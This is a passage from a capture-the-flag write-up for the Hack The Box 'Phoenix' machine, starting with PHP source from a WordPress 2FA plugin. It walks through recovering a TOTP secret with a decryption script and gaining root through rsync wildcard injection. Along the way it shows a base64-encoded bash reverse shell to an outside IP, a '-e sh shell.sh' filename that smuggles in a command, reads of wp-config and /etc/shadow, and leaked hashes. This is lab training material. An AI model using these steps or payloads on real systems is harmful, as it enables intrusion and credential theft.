                        $key = get_option( 'mo2f_encryption_key' );
                        $session_id = MO2f_Utility::decrypt_data( $session_id, $key );
                        $db_value = $Mo2fdbQueries->get_user_login_details( $variable, $session_id );
                        if ( in_array( $variable, array( "mo2f_rba_status", "mo_2_factor_kba_questions" ) ) ) {
                                $db_value = unserialize( $db_value );
                        }
                        return $db_value;
                }
        }

        /**
         * The function gets the cookie value after decoding and decryption.
         *
         * @param string $cookiename - the cookie name
         *
         * @return string
         */
        public static function mo2f_get_cookie_values( $cookiename ) {

                $key        = get_option( 'mo2f_encryption_key' );
                if ( isset( $_COOKIE[ $cookiename ] ) ) {
                        $decrypted_data = MO2f_Utility::decrypt_data( base64_decode( $_COOKIE[ $cookiename ] ), $key );

                        if(MO2f_Utility::isJSON($decrypted_data))
                         $decrypted_data = json_decode($decrypted_data);

                        if ( $decrypted_data ) {
                                $decrypted_data_array = explode( '&', $decrypted_data );

                                $cookie_value         = $decrypted_data_array[0];
                                if(sizeof($decrypted_data_array) == 2 ){
                                        $cookie_creation_time = new DateTime( $decrypted_data_array[1] );
                                }else{
                                        $cookie_creation_time = new DateTime( array_pop($decrypted_data_array) );
                                        $cookie_value = implode('&', $decrypted_data_array);
                                }
                                $current_time         = new DateTime( 'now' );

                                $interval = $cookie_creation_time->diff( $current_time );
                                $minutes  = $interval->format( '%i' );

                                $is_cookie_valid = $minutes <= 5 ? true : false;

                                return $is_cookie_valid ? $cookie_value : false;

                        } else {
                                return false;
                        }
                } else {
                        return false;
                }
        }
    
   public static function isJSON($string){
           return is_string($string) && is_array(json_decode($string, true)) ? true : false;
        }
        /**
         * The function sets the cookie value after encryption and encoding.
         *
         * @param string $cookiename - the cookie name
         * @param string $cookievalue - the cookie value to be set
         *
         * @return string
         */
        public static function  mo2f_set_cookie_values( $cookiename, $cookievalue ) {

                $key        = get_option( 'mo2f_encryption_key' );

                $current_time = new DateTime( 'now' );
                $current_time = $current_time->format( 'Y-m-d H:i:sP' );
                $cookievalue  = $cookievalue . '&' . $current_time;

                $cookievalue_encrypted = MO2f_Utility::encrypt_data( $cookievalue, $key );
                // setcookie( $cookiename, base64_encode( $cookievalue_encrypted ) );
                // setcookie( $cookiename, base64_encode( $cookievalue_encrypted ),NULL,NULL,NULL,NULL, TRUE );
                $_COOKIE[$cookiename] = base64_encode( $cookievalue_encrypted );
        }

        /**
         * @param string $data - the key=value pairs separated with &
         *
         * @return string
         */
        public static function encrypt_data( $data, $key ) {
                $plaintext = $data;
                $ivlen = openssl_cipher_iv_length($cipher="AES-128-CBC");
                $iv = openssl_random_pseudo_bytes($ivlen);
                $ciphertext_raw = openssl_encrypt($plaintext, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv);
                $hmac = hash_hmac('sha256', $ciphertext_raw, $key, $as_binary=true);
                $ciphertext = base64_encode( $iv.$hmac.$ciphertext_raw );
                return $ciphertext;
        }

        /**
         * The function unsets the session variables passed.
         *
         * @param array $variables - the array of session variables to be unset
         *
         * @return NA
         */
        public static function unset_session_variables( $variables ) {
                if ( gettype( $variables ) == "array" ) {
                        foreach ( $variables as $variable ) {
                                if ( isset( $_SESSION[ $variable ] ) ) {
                                        unset( $_SESSION[ $variable ] );
                                }
                        }
                } else {
                        if ( isset( $_SESSION[ $variables ] ) ) {
                                unset( $_SESSION[ $variables ] );
                        }
                }
        }

        /**
         * The function unsets the cookie variables passed.
         *
         * @param array $variables - the array of cookie variables to be unset
         *
         * @return NA
         */
        public static function unset_cookie_variables( $variables ) {

                if ( gettype( $variables ) == "array" ) {
                        foreach ( $variables as $variable ) {
                                if ( isset( $_COOKIE[ $variable ] ) ) {
                                        setcookie( $variable, '', time() - 3600,NULL,NULL,NULL, TRUE );
                                }
                        }
                } else {
                        if ( isset( $_COOKIE[ $variables ] ) ) {
                                setcookie( $variables, '', time() - 3600,NULL,NULL,NULL, TRUE );
                        }
                }

        }

        /**
         * The function unsets the temp table variables passed.
         *
         * @param array $variables - the array of temporary table variables to be unset
         * @param string $session_id - the session_id for which it should be destroyed
         *
         * @return NA
         */
        public static function unset_temp_user_details_in_table( $variables, $session_id, $command='' ) {
                global $Mo2fdbQueries;
                $key        = get_option( 'mo2f_encryption_key' );
                $session_id = MO2f_Utility::decrypt_data( $session_id, $key );
                if($command == "destroy"){
                        $Mo2fdbQueries->delete_user_login_sessions( $session_id );
                }else{
                        $Mo2fdbQueries->save_user_login_details( $session_id, array($variables => ''));
                }
        }



        /**
         * The function decodes the twofactor methods
         *
         * @param array $variables - the selected 2-factor method and the decode type.
         *
         * @return NA
         */
        public static function mo2f_decode_2_factor( $selected_2_factor_method, $decode_type ) {

                if ( $selected_2_factor_method == 'NONE' ) {
                        return $selected_2_factor_method;
                }else if($selected_2_factor_method == "OTP Over Email")
                {
                        $selected_2_factor_method = "OTPOverEmail";
                }


                $wpdb_2fa_methods = array(
                        "miniOrangeQRCodeAuthentication" => "miniOrange QR Code Authentication",
                        "miniOrangeSoftToken"            => "miniOrange Soft Token",
                        "miniOrangePushNotification"     => "miniOrange Push Notification",
                        "GoogleAuthenticator"            => "Google Authenticator",
                        "AuthyAuthenticator"             => "Authy Authenticator",
                        "SecurityQuestions"              => "Security Questions",
                        "EmailVerification"              => "Email Verification",
                        "OTPOverSMS"                     => "OTP Over SMS",
                        "OTPOverEmail"                                   => "OTP Over Email",
                        "DuoAuthenticator"               => "Duo Authenticator"
                );

                $server_2fa_methods = array(
                        "miniOrange QR Code Authentication" => "MOBILE AUTHENTICATION",
                        "miniOrange Soft Token"             => "SOFT TOKEN",
                        "miniOrange Push Notification"      => "PUSH NOTIFICATIONS",
                        "Google Authenticator"              => "GOOGLE AUTHENTICATOR",
                        "Authy Authenticator"               => "GOOGLE AUTHENTICATOR",
                        "Security Questions"                => "KBA",
                        "Email Verification"                => "OUT OF BAND EMAIL",
                        "OTP Over SMS"                      => "SMS",
                        "EMAIL"                             => "OTP Over Email",
                        "OTPOverEmail"                                          => "OTP Over Email",
                        "Duo Authenticator"                 => "Duo Authenticator",
                        "DUO AUTHENTICATOR"                                     => "Duo Authenticator",
                        "OTP Over Email"                                        => "EMAIL",
                        "OTP OVER EMAIL"                    => "EMAIL"

                );

                $server_to_wpdb_2fa_methods = array(
                        "MOBILE AUTHENTICATION" => "miniOrange QR Code Authentication",
                        "SOFT TOKEN"            => "miniOrange Soft Token",
                        "PUSH NOTIFICATIONS"    => "miniOrange Push Notification",
                        "GOOGLE AUTHENTICATOR"  => "Google Authenticator",
                        "KBA"                   => "Security Questions",
                        "OUT OF BAND EMAIL"     => "Email Verification",
                        "SMS"                   => "OTP Over SMS",
                        "EMAIL"                 => "OTP Over Email",
                        "OTPOverEmail"                  => "OTP Over Email",
                        "OTP OVER EMAIL"                => "OTP Over Email",
                        "OTP Over SMS"                  => "OTP Over SMS",
                        "Security Questions"    => "Security Questions",
                        "Google Authenticator"  => "Google Authenticator"
                );

                 $methodname='';
                if ( $decode_type == "wpdb" ) {
                        $methodname = isset($wpdb_2fa_methods[ $selected_2_factor_method ])?$wpdb_2fa_methods[ $selected_2_factor_method ]:$selected_2_factor_method;
                } else if ( $decode_type == "server" ) {
                        $methodname = isset($server_2fa_methods[ $selected_2_factor_method ])?$server_2fa_methods[ $selected_2_factor_method ]:$selected_2_factor_method;
                } else {
                        $methodname = isset($server_to_wpdb_2fa_methods[ $selected_2_factor_method ])?$server_to_wpdb_2fa_methods[ $selected_2_factor_method ]:$selected_2_factor_method;
                }
                return $methodname;

        }
        public static function is_same_method($method,$current_method){
                if($method == $current_method || $method == MO2f_Utility::mo2f_decode_2_factor($current_method,'wpdb') || $method == MO2f_Utility::mo2f_decode_2_factor($current_method,'') || MO2f_Utility::mo2f_decode_2_factor($current_method,'server') == $method)
                        return true;
                return false;
        }

        public static function get_plugin_name_by_identifier( $plugin_identitifier ){
                $all_plugins = get_plugins();
                $plugin_details = $all_plugins[$plugin_identitifier];

                return $plugin_details["Name"] ? $plugin_details["Name"] : "No Plugin selected" ;
        }
   
    public static function isBlank($value)
    {
        if (!isset($value) || empty($value)) return TRUE;
        return FALSE;
    }

    public static function get_index_value($var,$index){
        switch ($var) {
                case 'GLOBALS':
                        return isset($GLOBALS[$index])?$GLOBALS[$index]:false;
                        break;
    
                default:
                        return false;
                        break;
        }
        }

        public static function get_codes_email_content($codes){
        $message =  '<table cellpadding="25" style="margin:0px auto">
        <tbody>
        <tr>
        <td>
        <table cellpadding="24" width="584px" style="margin:0 auto;max-width:584px;background-color:#f6f4f4;border:1px solid #a8adad">
        <tbody>
        <tr>
        <td><img src="https://ci5.googleusercontent.com/proxy/10EQeM1udyBOkfD2dwxGhIaMXV4lOwCRtUecpsDkZISL0JIkOL2JhaYhVp54q6Sk656rW2rpAFJFEgGQiAOVcYIIKxXYMHHMNSNB=s0-d-e1-ft#https://login.xecurify.com/moas/images/xecurify-logo.png" style="color:#5fb336;text-decoration:none;display:block;width:auto;height:auto;max-height:35px" class="CToWUd"></td>
        </tr>
        </tbody>
        </table>
        <table cellpadding="24" style="background:#fff;border:1px solid #a8adad;width:584px;border-top:none;color:#4d4b48;font-family:Arial,Helvetica,sans-serif;font-size:13px;line-height:18px">
        <tbody>
        <tr>
        <td>
        <p style="margin-top:0;margin-bottom:20px">Dear Customer,</p>
        <p style="margin-top:0;margin-bottom:10px">You initiated a transaction from <b>WordPress 2 Factor Authentication Plugin</b>:</p>
        <p style="margin-top:0;margin-bottom:10px">Your backup codes are:-
        <table cellspacing="10">
            <tr>';
            for ($x = 0; $x < sizeof($codes); $x++) {
                        $message = $message.'<td>'.$codes[$x].'</td>';
                       
                }
        $message = $message.'</table></p>
        <p style="margin-top:0;margin-bottom:10px">Please use this carefully as each code can only be used once. Please do not share these codes with anyone.</p>
        <p style="margin-top:0;margin-bottom:10px">Also, we would highly recommend you to reconfigure your two-factor after logging in.</p>
        <p style="margin-top:0;margin-bottom:15px">Thank you,<br>miniOrange Team</p>
        <p style="margin-top:0;margin-bottom:0px;font-size:11px">Disclaimer: This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed.</p>
        </div></div></td>
        </tr>
        </tbody>
        </table>
        </td>
        </tr>
        </tbody>
        </table>';
        return $message;
    }

    public static function get_codes_warning_email_content($codes_remaining){
        $message =  '<table cellpadding="25" style="margin:0px auto">
        <tbody>
        <tr>
        <td>
        <table cellpadding="24" width="584px" style="margin:0 auto;max-width:584px;background-color:#f6f4f4;border:1px solid #a8adad">
        <tbody>
        <tr>
        <td><img src="https://ci5.googleusercontent.com/proxy/10EQeM1udyBOkfD2dwxGhIaMXV4lOwCRtUecpsDkZISL0JIkOL2JhaYhVp54q6Sk656rW2rpAFJFEgGQiAOVcYIIKxXYMHHMNSNB=s0-d-e1-ft#https://login.xecurify.com/moas/images/xecurify-logo.png" style="color:#5fb336;text-decoration:none;display:block;width:auto;height:auto;max-height:35px" class="CToWUd"></td>
        </tr>
        </tbody>
        </table>
        <table cellpadding="24" style="background:#fff;border:1px solid #a8adad;width:584px;border-top:none;color:#4d4b48;font-family:Arial,Helvetica,sans-serif;font-size:13px;line-height:18px">
        <tbody>
        <tr>
        <td>
        <p style="margin-top:0;margin-bottom:20px">Dear Customer,</p>
        <p style="margin-top:0;margin-bottom:10px">You have '.$codes_remaining.' backup codes remaining. Kindly reconfigure your two-factor to avoid being locked out.</b></p>
        <p style="margin-top:0;margin-bottom:15px">Thank you,<br>miniOrange Team</p>
        <p style="margin-top:0;margin-bottom:0px;font-size:11px">Disclaimer: This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed.</p>
        </div></div></td>
        </tr>
        </tbody>
        </table>
        </td>
        </tr>
        </tbody>
        </table>';
        return $message;
    }

    public static function mo2f_get_codes_hash($codes){
        $codes_hash=array();
        for ($x = 0; $x < sizeof($codes); $x++) {
            $str = $codes[$x];
            array_push($codes_hash,md5($str));
        }
        return $codes_hash;
    }

    public static function mo2f_email_backup_codes($codes, $mo2f_user_email){
        $subject    = '2-Factor Authentication(Backup Codes)';
        $headers    = array('Content-Type: text/html; charset=UTF-8');
        $message    = MO2f_Utility::get_codes_email_content($codes);
        $result     = wp_mail($mo2f_user_email,$subject,$message,$headers);
        return $result;
    }

    public static function mo2f_download_backup_codes($id, $codes){
        update_user_meta($id, 'mo_backup_code_downloaded', 1);
        header('Content-Disposition: attachment; filename=miniOrange2-factor-BackupCodes.txt');
        echo "Two Factor Backup Codes:".PHP_EOL.PHP_EOL;
        echo "These are the codes that can be used in case you lose your phone or cannot access your email. Please reconfigure your authentication method after login.".PHP_EOL."Please use this carefully as each code can only be used once. Please do not share these codes with anyone..".PHP_EOL.PHP_EOL;
        for ($x = 0; $x < sizeof($codes); $x++){
            $str1= $codes[$x];
            echo(($x+1).". ".$str1." ");
        }
                                
        exit;
    }

    public static function mo2f_debug_file($text){
        if(MoWpnsUtility::get_mo2f_db_option('mo2f_enable_debug_log', 'site_option') == 1){
                $debug_log_path = wp_upload_dir();
                $debug_log_path = $debug_log_path['basedir'].DIRECTORY_SEPARATOR;
                $filename = 'miniorange_debug_log.txt';
                $data = '[' . date("Y/m/d").' '. time().']:'.$text."\n";
                $handle = fopen($debug_log_path.DIRECTORY_SEPARATOR.$filename,'a+');
                        fwrite($handle,$data);
                        fclose($handle);
        }
    }


    public static function mo2f_mail_and_download_codes(){
      global $Mo2fdbQueries;
       
        $id = get_current_user_id();
        $mo2f_user_email = $Mo2fdbQueries->get_user_detail( 'mo2f_user_email', $id );
        if(empty($mo2f_user_email)){
            $currentuser = get_user_by( 'id', $id );
            $mo2f_user_email = $currentuser->user_email;
        }
        $generate_backup_code = new Customer_Cloud_Setup();
        $codes=$generate_backup_code->mo_2f_generate_backup_codes($mo2f_user_email, site_url());
         
        if($codes == 'LimitReached'|| $codes == 'UserLimitReached' || $codes == 'AllUsed' || $codes == 'invalid_request')
                return $codes;

        $codes = explode(' ', $codes);
        $codes_hash=MO2f_Utility::mo2f_get_codes_hash($codes);
        $result = MO2f_Utility::mo2f_email_backup_codes($codes, $mo2f_user_email);
        update_user_meta($id, 'mo_backup_code_generated', 1);
        update_user_meta($id, 'mo_backup_code_downloaded', 1);
        MO2f_Utility::mo2f_download_backup_codes($id, $codes);
    }


}

?>

then We can grab the wordpress login from the wp-config.php file:

define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', '<++32%himself%FIRM%section%32++>' );
define( 'DB_HOST', 'localhost:/var/run/mysqld/mysqld.sock' );

then connect to mysql to get more information:

wp_user@phoenix:/$ mysql -uwordpress -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2823
Server version: 8.0.28-0ubuntu0.20.04.3 (Ubuntu)

Copyright (c) 2000, 2022, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select meta_value from wp_usermeta WHERE meta_key IN ('mo2f_gauth_key');
+--------------------------------------------------------------------------------------------------------------+
| meta_value                                                                                                   |
+--------------------------------------------------------------------------------------------------------------+
| qGEPwI6RQBxF4aXM6PVuriofiwCH4mjc4ZjO3jWN5gDDX5MzLHTfDk3tRGK7vwkkTbAjoxNfqFeMjJZoSI5yPF25Hd5b8lSaF/Dpc6WMBTA= |
| mFeor0xmxMGd4ncJhPAuPGM6HXap6neH469PGQ2wVj23TuAYSULMTQTnQcH4SgnaO7BVPok5rTc4vqxYMYZCFNJC35KeyByT3cF05m27lvI= |
+--------------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)

mysql> select meta_value from wp_usermeta WHERE meta_key IN ('mo2f_get_auth_rnd_string');
+------------+
| meta_value |
+------------+
| kHHxxX3f   |
| M6EwACNR   |
+------------+
2 rows in set (0.00 sec)

and then easily write an decrypt exp php file to get the key:

<?php
function decrypt_data($data, $key) {
                $c = base64_decode($data);
                $ivlen = openssl_cipher_iv_length($cipher="AES-128-CBC");
                $iv = substr($c, 0, $ivlen);
                $hmac = substr($c, $ivlen, $sha2len=32);
                $ciphertext_raw = substr($c, $ivlen+$sha2len);
                $original_plaintext = openssl_decrypt($ciphertext_raw, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv);
                $calcmac = hash_hmac('sha256', $ciphertext_raw, $key, $as_binary=true);


                return $original_plaintext;
        }
echo decrypt_data("qGEPwI6RQBxF4aXM6PVuriofiwCH4mjc4ZjO3jWN5gDDX5MzLHTfDk3tRGK7vwkkTbAjoxNfqFeMjJZoSI5yPF25Hd5b8lSaF/Dpc6WMBTA=","kHHxxX3f");
?>

1
2
3

┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# php exp.php                                          
PDEEWIVJSIDWS6WO

then we can use OPT dynamic code to login:

but login is no use for later movement, we just need to known there is a way to this

User own

We can completely bypass the 2FA by renaming the plugin over at /opt/wordpress/ but it doesn’t get us much further than we already are.

Instead back to using SSH, we can look into bypassing the 2FA completely (for ssh this time, not wordpress), in the /etc/pam.d/ssh config, we see reference to an accessfile:

Root own

we found a cron job file in

1 2	editor@phoenix:/dev/shm$ find /usr/local/bin/ -perm -o=x -type f 2>/dev/null /usr/local/bin/cron.sh.x

We can run pspy however we can’t see processes from other users. Enumerating the box more, we find cron.sh.x, if we run this manually and see what it’s doing:

2022/03/23 19:15:04 CMD: UID=1002 PID=50487  | /usr/local/bin/cron.sh.x -c exec '/usr/local/bin/cron.sh.x' "$@" /usr/local/bin/cron.sh.x
2022/03/23 19:15:04 CMD: UID=1002 PID=50489  | mysqldump -u root wordpress 
2022/03/23 19:15:04 CMD: UID=1002 PID=50490  | tar -cf phoenix.htb.2022-03-23-19-15.tar dbbackup.sql 
2022/03/23 19:15:04 CMD: UID=1002 PID=50491  | rm dbbackup.sql 
2022/03/23 19:15:04 CMD: UID=1002 PID=50492  | gzip -9 phoenix.htb.2022-03-23-19-15.tar 
2022/03/23 19:15:20 CMD: UID=1002 PID=50493  | find . -type f -mmin +30 -delete 
2022/03/23 19:15:20 CMD: UID=1002 PID=50494  | rsync --ignore-existing -t phoenix.htb.2022-03-23-18-48.tar.gz phoenix.htb.2022-03-23-18-51.tar.gz phoenix.htb.2022-03-23-18-54.tar.gz phoenix.htb.2022-03-23-18-57.tar.gz phoenix.htb.2022-03-23-19-00.tar.gz phoenix.htb.2022-03-23-19-03.tar.gz phoenix.htb.2022-03-23-19-05.tar.gz phoenix.htb.2022-03-23-19-06.tar.gz phoenix.htb.2022-03-23-19-09.tar.gz phoenix.htb.2022-03-23-19-12.tar.gz phoenix.htb.2022-03-23-19-15.tar.gz jit@10.11.12.14:/backups/
2022/03/23 19:15:20 CMD: UID=1002 PID=50495  | ssh -l jit 10.11.12.14 rsync --server -te.LsfxC --ignore-existing . /backups/

It seems to use a few wild cards. We can try exploit this line:

1	rsync --ignore-existing -t . jit@10.11.12.14:/backups/

We can see some article here:

gtfobins-rsync
Wildcards Spare tricks

We can create 2 files in /backups to exploit this:

echo "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEwLzEyMzQgMD4mMQ==|base64 -d|bash" > shell.sh

touch -- "-e sh shell.sh"

editor@phoenix:/backups$ chmod +x shell.sh
editor@phoenix:/backups$ chmod +x -- '-e sh shell.sh'
editor@phoenix:/backups$ ls -la
total 5300
drwxr-x---  2 editor editor   4096 Mar 23 19:39  .
drwxr-xr-x 20 root   root     4096 Feb 25 19:40  ..
-rwxrwxr-x  1 editor editor      0 Mar 23 19:38 '-e sh shell.sh'
-rw-r--r--  1 root   root   675305 Mar 23 19:12  phoenix.htb.2022-03-23-19-12.tar.gz
-rw-rw-r--  1 editor editor    151 Mar 23 19:15  phoenix.htb.2022-03-23-19-15.tar.gz
-rw-r--r--  1 root   root   675308 Mar 23 19:18  phoenix.htb.2022-03-23-19-18.tar.gz
-rw-r--r--  1 root   root   675308 Mar 23 19:21  phoenix.htb.2022-03-23-19-21.tar.gz
-rw-r--r--  1 root   root   675303 Mar 23 19:24  phoenix.htb.2022-03-23-19-24.tar.gz
-rw-rw-r--  1 editor editor    152 Mar 23 19:27  phoenix.htb.2022-03-23-19-27.tar.gz
-rw-r--r--  1 root   root   675307 Mar 23 19:30  phoenix.htb.2022-03-23-19-30.tar.gz
-rw-r--r--  1 root   root   675307 Mar 23 19:33  phoenix.htb.2022-03-23-19-33.tar.gz
-rw-r--r--  1 root   root   675308 Mar 23 19:36  phoenix.htb.2022-03-23-19-36.tar.gz
-rw-r--r--  1 root   root   675308 Mar 23 19:39  phoenix.htb.2022-03-23-19-39.tar.gz
-rwxrwxr-x  1 editor editor     85 Mar 23 19:39  shell.sh

after 3 minutes, we got a root shell:

┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# nc -lvp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.11.149.
Ncat: Connection from 10.10.11.149:34274.
bash: cannot set terminal process group (50726): Inappropriate ioctl for device
bash: no job control in this shell
root@phoenix:/backups# cat /root/root.txt
cat /root/root.txt
258b721224d4a73b09b555077a962004
root@phoenix:/backups# cat /etc/shadow | grep root
cat /etc/shadow | grep root
root:$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0:18944:0:99999:7:::

Summary of knowledge

wordpress enumeration
Asgaros Forum < 2.0.0 plugin - Subscriber+ Blind SQL Injection
john crack wordpress hash
Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload to get shell
OPT KEY decrypt
bypass linux 2FA
use cron job file rsync process to privesc

Contact me

QQ: 1185151867
twitter: https://twitter.com/fdlucifer11
github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…